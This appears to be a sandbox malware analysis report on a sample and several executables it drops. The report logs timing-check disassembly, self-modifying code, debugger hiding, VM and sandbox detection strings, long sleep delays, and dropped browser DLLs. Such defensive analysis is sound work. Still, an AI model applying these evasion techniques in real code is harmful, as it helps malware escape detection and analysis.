Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990628 second address: 499063D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499063D second address: 499064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1507F26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499064D second address: 4990651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990651 second address: 4990666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE1507F26Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990666 second address: 4990678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990678 second address: 4990696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FBB370h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, 0D8D3511h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990696 second address: 49906B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a xor dword ptr [ebp-08h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE1472CB60h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49906B7 second address: 49906BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49906BD second address: 499076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE1472CB5Ch 0x00000009 jmp 00007FEE1472CB65h 0x0000000e popfd 0x0000000f mov si, 9037h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xor eax, ebp 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b pushfd 0x0000001c jmp 00007FEE1472CB65h 0x00000021 add ecx, 7AD95A96h 0x00000027 jmp 00007FEE1472CB61h 0x0000002c popfd 0x0000002d popad 0x0000002e nop 0x0000002f pushad 0x00000030 mov esi, 7CDED8A3h 0x00000035 pushfd 0x00000036 jmp 00007FEE1472CB68h 0x0000003b sub al, FFFFFFE8h 0x0000003e jmp 00007FEE1472CB5Bh 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007FEE1472CB69h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499076F second address: 4990782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990782 second address: 49907CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FEE1472CB5Eh 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 jmp 00007FEE1472CB60h 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907CF second address: 49907D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907D3 second address: 49907D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907D9 second address: 49907DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907DF second address: 4990805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE1472CB69h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990805 second address: 4990892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE1507F277h 0x00000009 and ecx, 7486340Eh 0x0000000f jmp 00007FEE1507F279h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FEE1507F270h 0x0000001b sub eax, 57FF3288h 0x00000021 jmp 00007FEE1507F26Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a test eax, eax 0x0000002c jmp 00007FEE1507F276h 0x00000031 jne 00007FEE875AE70Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FEE1507F26Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990892 second address: 4990896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990896 second address: 499089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499089C second address: 49908A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 104E9FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11EF7C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 104E95B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9BE9FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B5F7C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9BE95B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 4A66C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 4A88BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 6DEB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Special instruction interceptor: First address: 35FCFC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Special instruction interceptor: First address: 35FDEF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Special instruction interceptor: First address: 52DBDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Special instruction interceptor: First address: 58FF10 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Special instruction interceptor: First address: BCDC3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Special instruction interceptor: First address: BCDD41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Special instruction interceptor: First address: D865EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Special instruction interceptor: First address: DF3806 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 6AEDC3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 6AEDD41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 6CA65EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Special instruction interceptor: First address: 6D13806 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Memory allocated: 54C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Memory allocated: 5570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Memory allocated: 7570000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_049E0801 rdtsc

0_2_049E0801

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Window / User API: threadDelayed 988	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3453	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6268	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3700	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6109	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1433
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6394
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3361

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7852	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808	Thread sleep count: 279 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808	Thread sleep time: -8370000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe TID: 8004	Thread sleep count: 988 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep count: 3453 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep count: 6268 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6688	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6388	Thread sleep count: 3700 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6388	Thread sleep count: 6109 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 5660	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 5740	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 7308	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 7268	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 7188	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe TID: 2124	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe TID: 5220	Thread sleep time: -30015s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 7556	Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe TID: 7108	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3872	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1700	Thread sleep count: 1433 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288	Thread sleep count: 594 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe TID: 7448	Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe TID: 7448	Thread sleep time: -636000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5300	Thread sleep count: 6394 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288	Thread sleep count: 3361 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -12912720851596678s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp	Jump to behavior

Source: file.exe, 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, c92938c010.exe, c92938c010.exe, 00000010.00000002.2937644494.000000000062C000.00000040.00000001.01000000.0000000D.sdmp, c92938c010.exe, 00000010.00000002.2973343876.0000000006C65000.00000040.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2939481486.00000000004E2000.00000040.00000001.01000000.0000000E.sdmp, c92938c010.exe, 00000013.00000002.2697547542.000000000062C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c92938c010.exe, 00000010.00000002.2946060114.000000000151E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: b5c7128cd0.exe, 00000014.00000003.2733338176.0000000001732000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2735414555.0000000001767000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000002.2751170583.000000000176A000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2732342322.000000000172E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000003.1673130752.00000000009D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: c92938c010.exe, 00000013.00000002.2698914818.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8+
Source: skotes.exe, 00000006.00000002.2954528432.0000000001156000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2954528432.0000000001199000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000002.2947882641.000000000157E000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000003.2696573532.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2700487170.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2733338176.0000000001732000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2735414555.0000000001767000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2732342322.000000000172E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.2949183672.000001251FE2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2bd330404c.exe, 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 00000022.00000002.2866895836.0000019CF8CA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: c92938c010.exe, 00000013.00000003.2696573532.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2700487170.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\i
Source: file.exe, 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, c92938c010.exe, 00000010.00000002.2937644494.000000000062C000.00000040.00000001.01000000.0000000D.sdmp, c92938c010.exe, 00000010.00000002.2973343876.0000000006C65000.00000040.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2939481486.00000000004E2000.00000040.00000001.01000000.0000000E.sdmp, c92938c010.exe, 00000013.00000002.2697547542.000000000062C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 00000022.00000002.2864997209.0000019CEECD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000E.00000002.2614464083.0000028D23715000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8]
Source: skotes.exe, 00000006.00000002.2954528432.0000000001199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW$

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_1-10091
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_1-10099
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10841

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: gbdyllo
